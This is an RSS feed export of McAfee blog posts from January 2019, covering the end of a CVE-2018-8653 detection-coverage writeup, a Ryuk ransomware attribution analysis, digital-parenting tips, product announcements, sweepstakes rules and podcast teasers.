  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/feed/ 0
2019 is Here – Have You Made Any Digital Parenting Resolutions for The Year? https://securingtomorrow.mcafee.com/consumer/2019-is-here-have-you-made-any-digital-parenting-resolutions-for-the-year/ https://securingtomorrow.mcafee.com/consumer/2019-is-here-have-you-made-any-digital-parenting-resolutions-for-the-year/#respond Wed, 09 Jan 2019 19:46:17 +0000 https://securingtomorrow.mcafee.com/?p=93684 Hello parents! Welcome to 2019. I have a hunch you are feeling all charged up and ready to start the new year on a positive note. Are your resolutions for the year ready? Take a minute and check- have you included any digital parenting resolutions in your list? If yes, great! If no, worry not, […]

The post 2019 is Here – Have You Made Any Digital Parenting Resolutions for The Year? appeared first on McAfee Blogs.

]]>
Hello parents! Welcome to 2019. I have a hunch you are feeling all charged up and ready to start the new year on a positive note. Are your resolutions for the year ready? Take a minute and check- have you included any digital parenting resolutions in your list? If yes, great! If no, worry not, McAfee Cybermum is here for you.

Parenting is not an easy job and the rapid progress of technology has added to it. In addition to teaching your kids values and life skills for the real world, you have to now do the same for the digital world too. At times, you don’t know whether you are doing too much or not enough; given the digital immigrants that we are- we have no resources to draw from. There is little time to step back and reflect over one’s own parenting style, leading to doubts and guilt. Wouldn’t it be lovely therefore if there was a ready reckoner on the subject?

Sharing my list of digital parenting resolutions with you. They are broadly aimed at helping us be more involved and evolved digital parents who are empowered to guide kids in the digital world. Feel free to add, delete or customize as per your family’s needs. Always keep in mind that each family is different, in terms of values and environment; and each child is different, in terms of ability and maturity.

Parents, presenting to you My Digital Parenting Resolution List for 2019:

  • Focus on digital media balance: There are several devices at home these days. The collective time spent working on a laptop, reading from an e-book and browsing social media on tabs or phones is considerable. To a young child, who can’t differentiate between work and pleasure, it may look like you can’t stay off digital devices the whole day and they may follow suit. You have to therefore fix your online schedule and practice digital balance.
  • Focus on having a positive digital media presence: What many parents fail to realize is that all social media users are media content creators and consumers. Each user is a newsmaker who can use digital media to create and share content, either negative or positive. As a consumer, a gullible user may accept the content as truth, without verifying. Fake news is rampant, and parents need to impress the need for fact-checking upon the kids.
  • Focus on values like empathy and mercy: The digital world brings the world to your homes and you connect with both strangers and acquaintances. There is therefore a greater need for kindness, tolerance and empathy. Posts may go viral and cause trouble or lead to cyberbullying. Children need to learn the importance of kindness and forgiveness to keep their digital world clean and happy. Parents can set an example by displaying these virtues in the real and the digital world.
  • Focus on self-control: One of the biggest issues nuclear families face today is that of work-life balance. Too many hours spent working, can lead to parents feeling guilty, who then try to compensate by gifting them expensive gifts. Set up a routine for games, chat and story time with kids to make up for long hours of absence.
  • Focus on being the perfect role model: As we know, children copy their parents. It’s like being a celebrity with the camera rolling 24/7. Modify your speech, actions, and digital actions so that children have the right guidance for their online behavior.
  • Focus on listening more: Parents generally tend to preach rather than listen. Plan to listen well in 2019. You will come to know a lot about your child’s life, aspirations and concerns if you do. The bonus is, they too will pay attention to you and your advice.
  • Focus on general health: You want your child to be healthy and active, right? The be the perfect role model, Exercise daily and play some games with your kids. Your kids too will then develop the same disciplined outlook towards health and sports. A healthy, active family usually prefer games to digital devices.
  • Focus on monitoring digital footprints and reputation: As your kids grow up, talk to them about the importance of exercising the right behavior online and the consequences of a poor digital reputation on academic and job prospects. Use examples from social media to differentiate between a desirable and an avoidable post or photo. Discuss what should be kept private and what can be shared.
  • Focus on cybersafety and privacy: With the rise in data breaches and ID theft via phishing attacks, it is imperative to discuss cyber safety regularly at home. Insist on the use of secured devices and scanning of every external device before use. Also, educate your children about malware and how apps, links and attachments are used to share them.
  • Focus on the monitoring and extent of parental supervision online: Though your children will have no problems with the installation of security tools like McAfee Total Protection, parental control is another matter altogether. Here, your diplomatic approach will stand in good stead. Share your concerns about strangers and cyber criminals and establish that you plan to monitor their online lives till they are mature enough to tackle issues themselves. Ensure that they understand you don’t mean to pry but protect

Start the year on a positive note. Take charge of your family’s digital life. Plan your parenting schedule, just like you plan your day. And yes, Happy New Year!!!

 

The post 2019 is Here – Have You Made Any Digital Parenting Resolutions for The Year? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/2019-is-here-have-you-made-any-digital-parenting-resolutions-for-the-year/feed/ 0
Ryuk Ransomware Attack: Rush to Attribution Misses the Point https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/#respond Wed, 09 Jan 2019 19:00:14 +0000 https://securingtomorrow.mcafee.com/?p=93619

Senior analyst Ryan Sherstobitoff contributed to this report. During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to […]

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

]]>

Senior analyst Ryan Sherstobitoff contributed to this report.

During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to link the attack to North Korea. Determining attribution was largely based on the fact that the Hermes ransomware has been used in the past by North Korean actors, and code blocks in Ryuk are similar to those in Hermes.

The McAfee Advanced Threat Research team has investigated this incident and determined how the malware works, how the attackers operate, and how to detect it. Based on the technical indicators, known cybercriminal characteristics, and evidence discovered on the dark web, our hypothesis is that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the hallmarks of a cybercrime operation.

How McAfee approaches attribution

Attribution is a critical part of any cybercrime investigation. However, technical evidence is often not enough to positively identify who is behind an attack because it does not provide all the pieces of the puzzle. Artifacts do not all appear at once; a new piece of evidence unearthed years after an attack can shine a different light on an investigation and introduce new challenges to current assumptions.

Ryuk attack: putting the pieces together

In October 2017, we investigated an attack on a Taiwanese bank. We discovered the actors used a clever tactic to distract the IT staff: a ransomware outbreak timed for the same moment that the thieves were stealing money. We used the term pseudo-ransomware to describe this attack. The malware was Hermes version 2.1.

One of the functions we often see in ransomware samples is that they will not execute if the victim’s system language is one of the following:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

That was October 2017. Searching earlier events, we noticed a posting from August 2017 in an underground forum in which a Russian-speaking actor offered the malware kit Hermes 2.1 ransomware:

What if the actor who attacked the Taiwanese bank simply bought a copy of Hermes and added it to the campaign to cause the distraction? Why go to the trouble to build something, when the actor can just buy the perfect distraction in an underground forum?

In the same underground forum thread we found a post from October 22, 2018, mentioning Ryuk.

This post contains a link to an article in the Russian security magazine Xakep.ru (“Hacker”) discussing the emergence of Ryuk and how it was first discovered by MalwareHunterTeam in August 2018. This first appearance came well before last week’s attack on newspaper printing services.

Manga connection

Ryuk, according to Wikipedia, refers to a Japanese manga character from the series “Death Note.” Ryuk apparently drops a death note, a fitting name for ransomware that drops ransom notes.

Ransomware is typically named by its cybercriminal developer, as opposed to the naming of state-sponsored malware, which is mostly is done by the security industry. It seems the criminals behind Ryuk are into manga.

The use of manga character names and references is common in the cybercriminal scene. We often come across manga-inspired nicknames and avatars in underground forums.

Technical indicators

Looking at research from our industry peers comparing Ryuk and Hermes, we notice that the functionalities are generally equal. We agree that the actors behind Ryuk have access to the Hermes source code.

Let’s dive a bit deeper into Ryuk and compare samples over the last couple of months regarding compilation times and the presence of program database (PDB) paths:

We can see the PDB paths are almost identical. When we compare samples from August and December 2018 and focus on the checksum values of the executables’ rich headers, they are also identical.

From a call-flow perspective, we notice the similarities and evolution of the code:

The Hermes 2.1 ransomware kit, renamed and redistributed as Ryuk.

The author and seller of Hermes 2.1 emphasizes that he is selling is a kit and not a service. This suggests that a buyer of the kit must do some fine tuning by setting up a distribution method (spam, exploit kit, or RDP, for example) and infrastructure to make Hermes work effectively. If changing a name and ransom note are part of these tuning options, then it is likely that Ryuk is an altered version Hermes 2.1.

Attribution: analyzing competing hypotheses

In the race to determine who is behind an attack, research facts (the What and How questions) are often put aside to focus on attribution (the Who question). Who did it? This pursuit is understandable yet fundamentally flawed. Attribution is crucial, but there will always be unanswered questions. Our approach focuses on answering the What and How questions by analyzing the malware, the infrastructure involved, and the incident response performed at the victim’s site.

Our approach is always to analyze competing hypotheses. When investigating an incident, we form several views and compare all the artifacts to support these hypotheses. We try not only to seek verifying evidence but also actively try to find evidence that falsifies a hypothesis. Keeping our eyes open for falsifying facts and constantly questioning our results are essential steps to avoid conformation bias. By following this method, we find the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

Examining competing hypotheses is a scientific approach to investigating cyber incidents. It may not help with the race to attribution, but it ensures the output is based on available evidence.

The most likely hypothesis in the Ryuk case is that of a cybercrime operation developed from a tool kit offered by a Russian-speaking actor. From the evidence, we see sample similarities over the past several months that indicate a tool kit is being used. The actors have targeted several sectors and have asked a high ransom, 500 Bitcoin. Who is responsible? We do not know. But we do know how the malware works, how the attackers operate, and how to detect the threat. That analysis is essential because it allows us to serve our customers.

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/feed/ 0
Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker https://securingtomorrow.mcafee.com/consumer/webadvisor-cryptojacking-blocker/ https://securingtomorrow.mcafee.com/consumer/webadvisor-cryptojacking-blocker/#respond Wed, 09 Jan 2019 11:00:46 +0000 https://securingtomorrow.mcafee.com/?p=93626

By now, you’ve probably heard of cryptocurrency, but you may not know exactly what it is. To put it simply, cryptocurrencies are virtual currencies that have actual monetary value in today’s world. They are limited entries of transactions into a single database, or public ledger, that can’t be changed without fulfilling certain conditions. These transactions […]

The post Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker appeared first on McAfee Blogs.

]]>

By now, you’ve probably heard of cryptocurrency, but you may not know exactly what it is. To put it simply, cryptocurrencies are virtual currencies that have actual monetary value in today’s world. They are limited entries of transactions into a single database, or public ledger, that can’t be changed without fulfilling certain conditions. These transactions are verified and added to the public ledger through cryptocurrency mining. Cryptocurrency miners try to make money by compiling these transactions into blocks and solving complicated mathematical problems to compete with other miners for the cryptocurrency. While this process of mining for cryptocurrencies can be lucrative, it requires large amounts of computing power.

Unfortunately, the need for massive amounts of hardware has provoked cybercriminals to participate in cryptojacking, a method of using malware to exploit victims’ computers to mine for cryptocurrencies. Cybercrooks spread cryptojacking malware through sketchy mobile apps, flawed software, and malware-infected ads. They can even cryptojack your device during a browsing session while you’re perusing a website that appears completely harmless. Once a user’s device becomes infected, the malware drains the device’s CPU, causing the user’s computer fan to be loud while the malware mines for cryptocurrencies in the background. Unfortunately, symptoms of cryptojacking are usually pretty subtle, with poor device performance being one of the few signs of its presence.

Thankfully, McAfee WebAdvisor is here to help. This security solution, which helps block users from malware and phishing attempts, now includes Cryptojacking Blocker. This enhancement is a Windows-based browser add-on available for Google Chrome that helps stop malicious websites from mining for cryptocurrency. So far, our direct and retail McAfee WebAdvisor customers have already started receiving the update that adds Cryptojacking Blocker to their product, and the customers who have WebAdvisor through other partners should begin to see this update roll out during Q1. The same thing goes for those who own McAfee LiveSafe and McAfee Total Protection. Additionally, we’re aiming to add support for Firefox in the coming months. And if you don’t already have WebAdvisor, you can download it for free on our website, with Cryptojacking Blocker included in your download.

In addition to using a security solution like McAfee WebAdvisor, here are some other general tips to help you stay safe online:

  • Create a strong, unique password. Although it may be easier to remember, reusing passwords across multiple accounts puts all of your data at risk even if just one of your accounts is breached. Choosing a complex password for each individual online account will act as a stronger first line of defense. You can also use a password manager so all of your credentials are consolidated into one place.
  • Be careful where you click. If you come across a website that seems sketchy or notice that the URL address looks odd, avoid interacting with the site entirely. Stick to browsing websites you know are reputable.
  • Update, update, update! Cybercriminals can take advantage of old software to spread cryptojacking malware. Keeping your software updated with the latest patches and security fixes can help you combat this threat.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/webadvisor-cryptojacking-blocker/feed/ 0
Verizon Teams Up with McAfee to Secure Today’s Connected Home https://securingtomorrow.mcafee.com/consumer/verizon-teams-up-with-mcafee/ https://securingtomorrow.mcafee.com/consumer/verizon-teams-up-with-mcafee/#respond Tue, 08 Jan 2019 23:48:57 +0000 https://securingtomorrow.mcafee.com/?p=93670

Few fields and industries change as rapidly as those in the technology sector. This fast-moving, adaptable and growing sector creates new applications, new devices, and new efficiencies designed to make our everyday lives easier — sometimes in ways we’ve never imagined. But more devices and applications, from a security standpoint, means cybercriminals could have more […]

The post Verizon Teams Up with McAfee to Secure Today’s Connected Home appeared first on McAfee Blogs.

]]>

Few fields and industries change as rapidly as those in the technology sector. This fast-moving, adaptable and growing sector creates new applications, new devices, and new efficiencies designed to make our everyday lives easier — sometimes in ways we’ve never imagined. But more devices and applications, from a security standpoint, means cybercriminals could have more opportunities to take advantage of flaws to conduct attacks. Additionally, the rapid growth in both software and hardware means today’s consumers are tasked with securing a plethora of personal devices.

This is not a sustainable path to a secure today’s technology landscape, one that’s continually growing and changing with each new addition. If we are going to continue to build a robust future, one including the rich potential inherent in Internet of Things (IoT) devices, we need a dynamic security solution that scales to meet the needs of modern-day society.

And that need is growing. According to a study from Market Research Future, the IoT market is set to potentially reach $124 billion in value by 2023 — only five years from now. Plus, Gartner predicts that there will be over 20 billion smart devices by 2020. That number is likely to grow, too.

That’s why we’ve worked with Verizon to launch Home Network Protection (HNP), a comprehensive security platform powered by McAfee Secure Home Platform, which has been designed to help safeguard consumers’ home networks. It does so through a robust, secure router designed to shield both traditional and newer IoT devices from malicious websites. It’s a proactive approach designed to keep consumer devices as safe as possible.

Customers using Fios by Verizon, a 100 percent fiber-optic network, and the Fios Quantum Gateway router can use HNP to secure their internet-connected devices, including smart cameras, baby monitors, television sets, and thermostats.

This is a massive milestone for consumer security in today’s digital age. Through a single provider, millions of consumers can access seamless protection from the latest threats — making modern conveniences easier to secure.

The post Verizon Teams Up with McAfee to Secure Today’s Connected Home appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/verizon-teams-up-with-mcafee/feed/ 0
Cash Out with Our CES 2019 #RT2Win Sweepstakes! https://securingtomorrow.mcafee.com/consumer/ces-2019-rt2win-sweepstakes/ https://securingtomorrow.mcafee.com/consumer/ces-2019-rt2win-sweepstakes/#respond Tue, 08 Jan 2019 18:00:20 +0000 https://securingtomorrow.mcafee.com/?p=93634

We’ve officially touched down in Las Vegas for CES 2019! If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. With the growing consumer technology landscape, we understand the importance of creating new solutions for those who want to live their connected lives with […]

The post Cash Out with Our CES 2019 #RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>

We’ve officially touched down in Las Vegas for CES 2019!

If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. With the growing consumer technology landscape, we understand the importance of creating new solutions for those who want to live their connected lives with confidence. That’s why we’ve made some exciting new additions to our security lineup and employed multiple partnerships with other innovators like Google and Verizon to help protect users’ online safety. Check out all the details, here.

To celebrate the latest innovations, we’re giving two [2] lucky people the chance to win a $500 Amazon gift card. Not heading to CES this year? No problem! Simply retweet one of our official contest tweets with the required hashtags between January 8th – 11th for your chance to win. Follow the instructions below to enter, and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Tuesday, January 8, 2019 at 8:00 a.m. PT. This tweet will include the hashtags: #McAfeeAtCES, #RT2Win, AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date from your own handle. The #McAfeeAtCES, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Friday, January 11, 2019 at 11:59 p.m. PST. All entries must be made before that date and time.
  • Winners will be notified on Monday, January 14, 2019 via Twitter direct message.
  • Limit one entry per person.
1. How To Win

Retweet one of our contest tweets on @McAfee_Home that include “#McAfeeAtCES, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on January 14, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee CES 2019 #RT2Win Sweepstakes will be conducted from January 8, 2019 through January 11, 2019. All entries for each day of the McAfee CES 2019 #RT2Win Sweepstakes must be received during the time allotted for the McAfee CES 2019 #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee CES 2019 #RT2Win Sweepstakes, duration is as follows:

  • Begins: Tuesday, January 8, 2019­­ at 8:00 a.m. PST
  • Ends: Friday, January 11, 2019 at 11:59 p.m. PST
  • Two [2] winners will be announced: Monday, January 14, 2019

For the McAfee CES 2019 #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee CES 2019 #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win, and hashtags.
  4. Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee CES 2019 #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #McAfeeAtCES, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Monday, January 14, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   

3. Eligibility:

McAfee CES 2019 #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee CES 2019 #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee CES 2019 #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee CES 2019 #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee CES 2019 #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by January 14, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee CES 2019 #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee CES 2019 #RT2Win Sweepstakes and all matters or disputes arising from the McAfee CES 2019 #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee CES 2019 #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee CES 2019 #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee CES 2019 #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee CES 2019 #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee CES 2019 #RT2Win Sweepstakes -related activity, or participation in the McAfee CES 2019 #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  • To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  • Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.
9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee CES 2019 #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee CES 2019 #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee CES 2019 #RT2Win Sweepstakes and all matters or disputes arising from the McAfee CES 2019 #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee CES 2019 #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 8, 2019 before January 11, 2019 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suiter 850, San Francisco, CA 94104

The post Cash Out with Our CES 2019 #RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/ces-2019-rt2win-sweepstakes/feed/ 0
Learn just what a hacker can do with remote RAT access https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/learn-just-what-a-hacker-can-do-with-remote-rat-access-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/learn-just-what-a-hacker-can-do-with-remote-rat-access-2/#respond Tue, 08 Jan 2019 17:00:41 +0000 https://securingtomorrow.mcafee.com/?p=93587

Remote administration tools, or RATs, lurk in phishing emails and malicious downloads across the internet. Once installed, they give hackers almost complete control over an infected machine.  “Hackable?” host Geoff Siskind is always the hacked but in the latest episode, he gets to peek behind the curtain of a RAT attack and see just what […]

The post Learn just what a hacker can do with remote RAT access appeared first on McAfee Blogs.

]]>

Remote administration tools, or RATs, lurk in phishing emails and malicious downloads across the internet. Once installed, they give hackers almost complete control over an infected machine. 

“Hackable?” host Geoff Siskind is always the hacked but in the latest episode, he gets to peek behind the curtain of a RAT attack and see just what hackers are able to do once they have remote access. Can they steal your files? See your webcam? Listen to your microphone?  

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.  

 


The post Learn just what a hacker can do with remote RAT access appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/learn-just-what-a-hacker-can-do-with-remote-rat-access-2/feed/ 0
Learn Just What a Hacker Can Do With Remote RAT Access https://securingtomorrow.mcafee.com/consumer/learn-just-what-a-hacker-can-do-with-remote-rat-access/ https://securingtomorrow.mcafee.com/consumer/learn-just-what-a-hacker-can-do-with-remote-rat-access/#respond Tue, 08 Jan 2019 17:00:24 +0000 https://securingtomorrow.mcafee.com/?p=93584

Remote administration tools, or RATs, lurk in phishing emails and malicious downloads across the internet. Once installed, they give hackers almost complete control over an infected machine.  “Hackable?” host Geoff Siskind is always the hacked but in the latest episode, he gets to peek behind the curtain of a RAT attack and see just what […]

The post Learn Just What a Hacker Can Do With Remote RAT Access appeared first on McAfee Blogs.

]]>

Remote administration tools, or RATs, lurk in phishing emails and malicious downloads across the internet. Once installed, they give hackers almost complete control over an infected machine. 

“Hackable?” host Geoff Siskind is always the hacked but in the latest episode, he gets to peek behind the curtain of a RAT attack and see just what hackers are able to do once they have remote access. Can they steal your files? See your webcam? Listen to your microphone?  

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this eye-opening episode.  

 


The post Learn Just What a Hacker Can Do With Remote RAT Access appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/learn-just-what-a-hacker-can-do-with-remote-rat-access/feed/ 0
How to Protect Three Common IoT Devices in 2019 https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/how-to-protect-three-common-iot-devices-in-2019/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/how-to-protect-three-common-iot-devices-in-2019/#respond Tue, 08 Jan 2019 14:00:02 +0000 https://securingtomorrow.mcafee.com/?p=93571

It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this […]

The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

]]>

